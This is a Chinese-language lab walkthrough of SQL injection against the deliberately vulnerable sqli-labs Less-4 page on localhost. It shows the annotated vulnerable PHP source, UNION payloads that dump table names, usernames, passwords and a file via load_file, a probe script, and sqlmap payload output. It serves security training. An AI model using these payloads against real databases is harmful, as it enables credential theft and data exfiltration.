sqli-lab-less4
一、靶标地址
Less-4 GET-Error Based- Double Quotes-string
#字符型带双引号基于报错的注入
http://127.0.0.1/sqli/less-4/
二、漏洞探测
http://127.0.0.1/sqli/less-4/?id=1'
#正常回显
http://127.0.0.1/sqli/Less-4/?id=1"
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
#单引号里面的是报错的语句 "1"") LIMIT 0,1
#通过报错猜测后面的语句为 where id=("$id") limit 0,1
http://127.0.0.1/sqli/less-3/?id=1
#正常回显
#select * from users where id=("1") limit 0,1;
三、源码分析
<?php
// sqli-labs Less-4 listing: deliberately vulnerable code that builds a MySQL
// query from the raw GET parameter `id`. The comments below mark where the
// untrusted value enters the query and which outputs disclose information.
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
// `id` is read straight from the query string; nothing validates or casts it.
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
// The unvalidated value is appended to result.txt before it is used.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
// Only the surrounding double quotes are added here; any quote or parenthesis
// already inside $id is left as-is, which is why a value such as 1" changes
// the shape of the query rather than being treated as data.
$id = '"' . $id . '"';//The concatenation operator (.) joins two string values.
// The value is spliced into the SQL text, so the caller controls part of the
// statement. A prepared statement with a bound parameter (or casting id to an
// integer before use) would keep user data out of the query structure; the
// legacy mysql_* extension used below offers no parameter binding.
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
// Success path echoes the matched row's username and password to the client.
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
// Failure path echoes the raw MySQL error text to the client, which is what
// reveals the query shape quoted in the detection section of this writeup.
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
四、黑盒与白盒测试
#白盒测试
$id = '"' . $id . '"';//并置运算符 (.) 用于把两个字符串值连接起来。
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
$id = "-1") --+"
$sql="SELECT * FROM users WHERE id=("-1") --+") LIMIT 0,1";
#无任何回显
#黑盒测试
#判断当前数据表的列数
$id="-1") order by 3 --+"
#当前用户名和数据库名
$id="-1") union select 1,user(),database() --+"
#查询表名
$id="-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+"
#information_schema是MySQL特有数据库，tables是其中的一个表名，table_name是其中一个列名，包含了所有数据表的名称；table_schema是所属数据库名。
#查询列名
$id="-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+"
#查询具体列数据
$id="-1") union select 1,2,group_concat(username) from users --+"
$id="-1") union select 1,2,group_concat(password) from users --+"
#读取文件
$id="-1") union select 1,2,load_file("C:\\flag.txt") --+"
#show global variables like '%secure%';
#secure_file_priv为空才可以读取
五、脚本撰写
import requests
# Single probe request against the lab endpoint; the response body is printed
# raw so the page's echo/error output can be inspected by hand.
# NOTE(review): this URL targets less-3 while the writeup covers less-4 -- confirm.
url = "http://127.0.0.1/sqli/less-3/index.php?id=1"

# Browser-like headers sent along with the request.
header = {}
header['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36'
header['Accept-Language'] = 'en-US,en;q=0.9'
header['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'

# Empty suffix: the request goes out exactly as `url` above.
payload = ""
target = url + payload

response = requests.get(target, headers=header)
print(response.text)
六、sqlmap
sqlmap -u http://127.0.0.1/sqli/less-4/index.php?id=1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1") AND 2082=2082#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1") AND (SELECT 6865 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(6865=6865,1))),0x7171767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("Eeda"="Eeda
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1") AND (SELECT 7060 FROM (SELECT(SLEEP(5)))bmLr) AND ("bQjf"="bQjf
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=-2956") UNION ALL SELECT NULL,NULL,CONCAT(0x716a716b71,0x4d616b4d424851416742774a464944735971475a4a654d6466566c4e6e435755655375714f53734e,0x7171767a71)#
七、总结
2、目前已有四种语句符合sql语法
// Four query shapes seen so far in this lab series. In every one $id is
// interpolated into the SQL string, so only the quoting/bracketing around the
// injection point differs; the underlying defect (no parameter binding) is the same.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";   // single-quoted string
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";     // bare value, no quotes
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; // single-quoted inside parentheses
$sql="SELECT * FROM users WHERE id=("$id") LIMIT 0,1"; // double-quoted inside parentheses (the Less-4 shape from the source above)